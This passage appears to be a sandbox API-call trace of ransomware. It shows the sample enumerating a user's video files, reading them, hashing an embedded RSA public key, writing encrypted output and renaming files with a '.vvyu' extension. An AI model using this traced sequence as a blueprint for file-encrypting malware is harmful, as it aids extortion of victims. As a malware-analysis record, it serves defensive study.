hHeap=0x6a0000) returned 1 [0195.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0d0a0 | out: hHeap=0x6a0000) returned 1 [0195.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c446a8 | out: hHeap=0x6a0000) returned 1 [0195.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bec8 | out: hHeap=0x6a0000) returned 1 [0195.901] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b678 | out: hHeap=0x6a0000) returned 1 [0195.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c0ec50 | out: hHeap=0x6a0000) returned 1 [0195.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37830 | out: hHeap=0x6a0000) returned 1 [0195.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0195.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c443e8 | out: hHeap=0x6a0000) returned 1 [0195.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.902] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1b0 | out: hHeap=0x6a0000) returned 1 [0195.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d31688 | out: hHeap=0x6a0000) returned 1 [0195.903] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84cc0 | out: hHeap=0x6a0000) returned 1 [0195.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2be2220 | out: hHeap=0x6a0000) returned 1 [0195.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a198 | out: hHeap=0x6a0000) returned 1 [0195.904] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42898 | out: hHeap=0x6a0000) returned 1 [0195.905] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2ccdff0 | out: hHeap=0x6a0000) returned 1 [0195.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c03ca0 | out: hHeap=0x6a0000) returned 1 [0195.906] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0195.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c4bb80 | out: hHeap=0x6a0000) returned 1 [0195.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44748 | out: hHeap=0x6a0000) returned 1 [0195.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.907] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.908] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3fb18 | out: hHeap=0x6a0000) returned 1 [0195.909] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.917] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3f920 | out: hHeap=0x6a0000) returned 1 [0195.917] WriteFile (in: hFile=0x52c, lpBuffer=0x2d4b778*, nNumberOfBytesToWrite=0xcd8c, lpNumberOfBytesWritten=0x30ffb14, lpOverlapped=0x0 | out: lpBuffer=0x2d4b778*, lpNumberOfBytesWritten=0x30ffb14*=0xcd8c, lpOverlapped=0x0) returned 1 [0195.918] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d4b778 | out: hHeap=0x6a0000) returned 1 [0195.918] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0xcd91, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.918] WriteFile (in: hFile=0x52c, lpBuffer=0x2c70bc8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2c70bc8*, lpNumberOfBytesWritten=0x30ffb50*=0x100, lpOverlapped=0x0) returned 1 [0195.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x60) returned 0x2c700d0 [0195.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x428) returned 0x2d2fc90 [0195.919] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2d2fc90, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0195.919] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x430) returned 0x2d42908 [0195.919] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2fc90 | out: hHeap=0x6a0000) returned 1 [0195.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c700d0 | out: hHeap=0x6a0000) returned 1 [0195.920] WriteFile (in: hFile=0x52c, lpBuffer=0x2d42908*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x2d42908*, lpNumberOfBytesWritten=0x30ffb50*=0x28, lpOverlapped=0x0) returned 1 [0195.920] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.920] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0195.920] WriteFile (in: hFile=0x52c, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x30ffb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x30ffb50*=0x26, lpOverlapped=0x0) returned 1 [0195.920] CloseHandle (hObject=0x52c) returned 1 [0195.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc0) returned 0x2c5b3e8 [0195.922] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8c0) returned 0x2d2cc80 [0195.922] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c5b3e8 | out: hHeap=0x6a0000) returned 1 [0195.922] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\EFsNJX_Z-O4v4Zp.swf" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\efsnjx_z-o4v4zp.swf"), lpNewFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\EFsNJX_Z-O4v4Zp.swf.vvyu" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\efsnjx_z-o4v4zp.swf.vvyu")) returned 1 [0195.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2cc80 | out: hHeap=0x6a0000) returned 1 [0195.924] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.924] VirtualFree (lpAddress=0x2040000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0195.927] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x762d70 | out: hHeap=0x6a0000) returned 1 [0195.927] FindNextFileW (in: hFindFile=0x2cbfa90, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3c6d1830, ftCreationTime.dwHighDateTime=0x1d8a2e6, ftLastAccessTime.dwLowDateTime=0x3cc50510, ftLastAccessTime.dwHighDateTime=0x1d8a67c, ftLastWriteTime.dwLowDateTime=0x3cc50510, ftLastWriteTime.dwHighDateTime=0x1d8a67c, nFileSizeHigh=0x0, nFileSizeLow=0x16a9c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m5lKRrHOPGPv2jhgTq-.flv", cAlternateFileName="M5LKRR~1.FLV")) returned 1 [0195.927] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x90) returned 0x2d47b20 [0195.928] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xd6) returned 0x762d70 [0195.928] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d47b20 | out: hHeap=0x6a0000) returned 1 [0195.928] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\m5lKRrHOPGPv2jhgTq-.flv") returned=".flv" [0195.928] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Videos\\-DwrKzslsF2\\SVKL6Wu5uab uSVqvA\\EXZou4J4nw j\\m5lKRrHOPGPv2jhgTq-.flv" (normalized: "c:\\users\\keecfmwgj\\videos\\-dwrkzslsf2\\svkl6wu5uab usvqva\\exzou4j4nw j\\m5lkrrhopgpv2jhgtq-.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x52c [0195.928] GetFileSizeEx (in: hFile=0x52c, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=92828) returned 1 [0195.929] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0195.932] SetFilePointerEx (in: hFile=0x52c, liDistanceToMove=0x16a76, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0195.932] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0195.934] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.934] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.934] SetFilePointer (in: hFile=0x52c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0195.934] ReadFile (in: hFile=0x52c, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0x16a9c, lpOverlapped=0x0) returned 1 [0195.936] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.936] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0195.936] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.936] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0195.936] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6ea898) returned 1 [0195.937] CryptCreateHash (in: hProv=0x6ea898, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0195.937] CryptHashData (hHash=0x2cbf990, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0195.937] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0195.937] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0195.937] CryptGetHashParam (in: hHash=0x2cbf990, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0195.937] GetLastError () returned 0x0 [0195.937] CryptDestroyHash (hHash=0x2cbf990) returned 1 [0195.937] CryptReleaseContext (hProv=0x6ea898, dwFlags=0x0) returned 1 [0195.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0195.938] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0195.938] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0195.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.938] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0195.938] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c88 | out: hHeap=0x6a0000) returned 1 [0195.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c88 [0195.938] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x16aa0) returned 0x2d4b778 [0195.938] SetFilePointer (in: hFile=0x52c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0195.939] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d42898 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a198 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d2cc98 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1b0 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1f8 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0195.939] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0195.940] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0195.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0195.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0195.940] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0195.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37800 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1f8 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x9) returned 0x2d3a1e0 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37840 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10e) returned 0x2c70bc8 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9bd8 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c44748 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x104) returned 0x2c4bb80 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x14) returned 0x2c443e8 [0195.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37830 [0195.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c70bc8 | out: hHeap=0x6a0000) returned 1 [0195.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1f8 | out: hHeap=0x6a0000) returned 1 [0195.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37840 | out: hHeap=0x6a0000) returned 1 [0195.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a1e0 | out: hHeap=0x6a0000) returned 1 [0195.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c44728 | out: hHeap=0x6a0000) returned 1 [0195.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.942] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a240 | out: hHeap=0x6a0000) returned 1 [0195.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0195.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2bf9c38 | out: hHeap=0x6a0000) returned 1 [0195.944] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3b920 | out: hHeap=0x6a0000) returned 1 [0195.944] GetCurrentThreadId () returned 0x264 [0195.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c70bc8 [0195.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x82) returned 0x2d46f30 [0195.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x2c) returned 0x2c84cc0 [0195.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6ea898 [0195.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x148) returned 0x2d31688 [0195.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37840 [0195.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2be2220 [0195.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.945] GetCurrentThreadId () returned 0x264 [0195.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.945] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xeb) returned 0x74ad40 [0195.945] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.946] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x64) returned 0x6fab90 [0195.946] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6fab90 | out: hHeap=0x6a0000) returned 1 [0195.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x74ad40 | out: hHeap=0x6a0000) returned 1 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x74ad40 [0195.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37800 | out: hHeap=0x6a0000) returned 1 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4c) returned 0x2c82a60 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37800 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x100) returned 0x2c03ca0 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a240 [0195.947] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37870 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378a0 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378b0 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37890 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378d0 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378c0 [0195.947] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1e0 [0195.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37870 | out: hHeap=0x6a0000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37870 [0195.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37850 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c378e0 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37900 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x2c37910 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a1f8 [0195.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37900 | out: hHeap=0x6a0000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x18) returned 0x2c44728 [0195.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378e0 | out: hHeap=0x6a0000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a1c8 [0195.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37910 | out: hHeap=0x6a0000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a258 [0195.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x8) returned 0x2c37850 [0195.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378d0 | out: hHeap=0x6a0000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a228 [0195.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c37850 | out: hHeap=0x6a0000) returned 1 [0195.948] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a210 [0195.948] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c378a0 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x10) returned 0x2d3a270 [0195.949] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a210 | out: hHeap=0x6a0000) returned 1 [0195.949] RtlAllocateHeap 